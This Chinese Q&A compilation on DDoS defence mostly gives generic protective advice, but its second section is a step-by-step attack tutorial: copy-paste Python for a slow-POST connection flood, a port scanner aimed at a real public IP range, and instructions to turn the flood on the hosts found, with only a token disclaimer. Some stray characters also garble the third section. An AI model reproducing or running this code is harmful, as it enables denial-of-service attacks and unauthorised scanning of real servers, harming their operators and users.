python防ddos攻擊

㈠ ddos防禦方法

ddos如何防禦方法如下：

工具／原料：電腦華碩A456U，Windows7、埠。

1、可以使用Inexpress、Express、Forwarding等工具來過濾不必要的服務和埠，即在路由器上過濾假IP。

㈡ 如何進行DDOS攻擊怎麼做

會Python嗎？下一個Python3.7.0-3.7.3,把代碼復制下，粘貼即可

代碼：

import socket

import time

import threading

#Pressure Test,ddos tool

#---------------------------

MAX_CONN=20000

PORT=80

HOST=".com"#在雙引號里輸入對方IP或域名，要保證他聯網了或開機了，這里拿網路做示範（別運行！不然後果自負！！）

PAGE="/index.php"

#---------------------------

buf=("POST %s HTTP/1.1 "

"Host: %s "

"Content-Length: 10000000 "

"Cookie: dklkt_dos_test "

" " % (PAGE,HOST))

socks=[]

def conn_thread():

global socks

for i in range(0,MAX_CONN):

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:

s.connect((HOST,PORT))

s.send(buf.encode())

print ("Send buf OK!,conn=%d "%i)

socks.append(s)

except Exception as ex:

print ("Could not connect to server or send error:%s"%ex)

time.sleep(10)

#end def

def send_thread():

global socks

while True:

for s in socks:

try:

s.send("f".encode())

#print "send OK!"

except Exception as ex:

print ("Send Exception:%s "%ex)

socks.remove(s)

s.close()

time.sleep(1)

#end def

conn_th=threading.Thread(target=conn_thread,args=())

send_th=threading.Thread(target=send_thread,args=())

conn_th.start()

send_th.start()

如果你要攻擊網站，以上代碼雖然可行，但是，攻擊效果很不好。

所以，最好用Windows里的PING進行檢測

操作：

在Windows搜索欄里輸入：cmd

輸入：

ping -n 10 -l 1 .com

//這里拿網路做示範，別真打網路！

那麼，就會發現，系統反映了：

正在 Ping .com [39.156.69.79] 具有 1 位元組的數據:

來自 39.156.69.79 的回復: 位元組=1 時間=27ms TTL=52

來自 39.156.69.79 的回復: 位元組=1 時間=26ms TTL=52

來自 39.156.69.79 的回復: 位元組=1 時間=27ms TTL=52

來自 39.156.69.79 的回復: 位元組=1 時間=27ms TTL=52

來自 39.156.69.79 的回復: 位元組=1 時間=27ms TTL=52

來自 39.156.69.79 的回復: 位元組=1 時間=27ms TTL=52

來自 39.156.69.79 的回復: 位元組=1 時間=29ms TTL=52

來自 39.156.69.79 的回復: 位元組=1 時間=26ms TTL=52

來自 39.156.69.79 的回復: 位元組=1 時間=27ms TTL=52

來自 39.156.69.79 的回復: 位元組=1 時間=27ms TTL=52

39.156.69.79 的 Ping 統計信息:

數據包: 已發送 = 10，已接收 = 10，丟失 = 0 (0% 丟失)，

往返行程的估計時間(以毫秒為單位):

最短 = 26ms，最長 = 29ms，平均 = 27ms

說明，網路的伺服器有一個主伺服器是39.156.69.79

那麼，就來查找網路的所有伺服器吧！

輸入以下代碼：

#絕大多數成功的網路攻擊都是以埠掃描開始的，在網路安全和黑客領域，埠掃描是經常用到的技術，可以探測指定主機上是否

#開放了指定埠，進一步判斷主機是否運行了某些重要的網路服務，最終判斷是否存在潛在的安全漏洞，從一定意義上將也屬於系統運維的范疇

#埠掃描器程序:模擬埠掃描器的工作原理，並採用多進程技術提高掃描速度

import socket

import sys

import multiprocessing

import time as t

def ports(ports_serve):

#獲取常用埠對應的服務名稱

for port in list(range(1,100))+[143,145,113,443,445,3389,8080]:

try:

ports_serve[port]=socket.getservbyport(port)

except socket.error:

pass

def ports_scan(host,ports_service):

ports_open=[]

try:

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

#超時時間的不同會影響掃描結果的精確度

socket.timeout(0.01)

except socket.error:

print('socket creation error')

sys.exit()

for port in ports_service:

try:

#嘗試連接指定埠

sock.connect((host,port))

#記錄打開的埠

ports_open.append(port)

sock.close()

except socket.error:

pass

return ports_open

if __name__ == '__main__':

m=multiprocessing.Manager()

ports_service=dict()

results=dict()

ports(ports_service)

#創建進程池，允許最多8個進程同時運行

pool = multiprocessing.Pool(processes=8)

net = '39.156.69.'#後面的IP少一個，因為要掃描這段區域內的IP，從而進行攻擊

for host_number in map(str,range(8,10)):

host = net + host_number

#創建一個新進程，同時記錄其運行結果

results[host] = pool.apply_async(ports_scan,(host,ports_service))

print('starting '+host+'...')

#關閉進程池，close()必須在join()之前調用

pool.close()

#等待進程池中的進程全部執行結束

pool.join()

#列印輸出結果

for host in results:

print('='*30)

print(host,'.'*10)

for port in results[host].get():

print(port,':',ports_service[port])

你會發現，Python反映了：

starting 39.156.69.8...

starting 39.156.69.9...

//並不是指網路只有這兩個伺服器！而是我們目前只能掃描到兩個！

接著，運行DDoS攻擊程序，把IP分別改為39.156.69.8和39.156.69.9

就可以實現DDoS攻擊了。

//註：請不要用於違法用途，並且不要隨意進行攻擊。如想使用，可攻擊虛擬機，但不要攻擊外網IP和域名！！！

㈢ 伺服器防禦ddos的方法

伺服器防止 DDoS 攻擊的方法包括但嘩咐芹不限於：

1、全面綜合地設計網路的安全體系，注意所使用的安全產品和網路設備。

2、提高網路管理人員的素質，關注安全信息，遵從有關安全措施，及時地升級系統，加強系統抗擊攻擊的能力。

3、在系統中加裝防火牆系統，利用防火牆系統對所有出入的數據包進行過濾，檢查邊界簡岩安全規則，確保輸出的包受到正確限制。

4、優化路由及網路結構。對路由器進行合理設置，降低攻擊的可能性。

5、優化對外提供服務的主機，對所有在網上提供公開服務的主機都加以限制。

6、安裝入侵檢測工具（如 NIPC、NGREP），經常掃描檢查系統，解決系統的漏洞，對系統文件和應用程序進行加密，並定期檢查這些文件的變化。

在響應方面，雖然還沒有很好的對付攻擊行為的方法，但仍然可以採取措施使攻擊的影響降至最小。對於提供信息服務的主機系統，應對的根本原則是：

盡可能地保持服務、迅速恢復服務。由於分布式攻擊入侵網路上的大量機器和網路設備，所以要對付這種攻擊歸根到底還是要解決網路的整體安全問題亂畢。

真正解決安全問題一定要多個部門的配合，從邊緣設備到骨幹網路都要認真做好防範攻擊的准備，一旦發現攻擊就要及時地掐斷最近攻擊來源的那個路徑，限制攻擊力度的無限增強。

網路用戶、管理者以及 ISP 之間應經常交流，共同制訂計劃，提高整個網路的安全性。

以上內容參考：網路-分布式拒絕服務攻擊

㈣ 伺服器被ddos攻擊如何防禦

首先，用戶要去嘗試了解攻擊來自於何處，原因是黑客在攻擊時所調用的IP地址並不一定是真實的，一旦掌握了真實的地址段，可以找到相應的碼段進行隔離，或者臨時過濾。同時，如果連接核心網的埠數量有限，也可以將埠進行屏蔽。
相較被攻擊之後的疲於應對，有完善的安全機制無疑要更好。有些人可能會選擇大規模部署網路基礎設施，但這種辦法只能拖延黑客的攻擊進度，並不能解決問題。與之相比的話，還不如去「屏蔽」那些區域性或者說臨時性的地址段，減少受攻擊的風險面。
此外，還可以在骨幹網、核心網的節點設置防護牆，這樣在遇到大規模攻擊時，可以讓主機減少被直接攻擊的可能。考慮到核心節點的帶寬通常較高，容易成為黑客重點攻擊的位置，所以定期掃描現有的主節點，發現可能導致風險的漏洞，就變得非常重要。

㈤ 什麼是DDOS攻擊如何防禦攻擊

DDoS攻擊就是分布式拒絕服務攻擊，指藉助於客戶/伺服器技術，將多個計算機聯合起來作為攻擊平台，對一個或多個目標發動DDoS攻擊，可使目標伺服器進入癱瘓狀態。

簡單點說，就是你家擺攤賣咸鴨蛋呢，我找一堆二流子圍著你家的咸鴨蛋攤問東問西，就是不買東西，或者買了東西，又說咸鴨蛋不好得退貨。讓真正想買咸鴨蛋的人買不到，讓你家正常的業務沒法進行。

防禦：

1、盡可能對系統載入最新補丁，並採取有效的合規性配置，降低漏洞利用風險；

2、採取合適的安全域劃分，配置防火牆、入侵檢測和防範系統，減緩攻擊。

3、採用分布式組網、負載均衡、提升系統容量等可靠性措施，增強總體服務能力。通俗的說就是，我找保安幫我維持鴨蛋攤的秩序，長得就不像是好人，舉止怪異的根本不讓靠近，並且在鴨蛋攤前面畫條線排隊，每個人只能有半分鍾的買鴨蛋的時間，並且多開幾個窗口賣鴨蛋。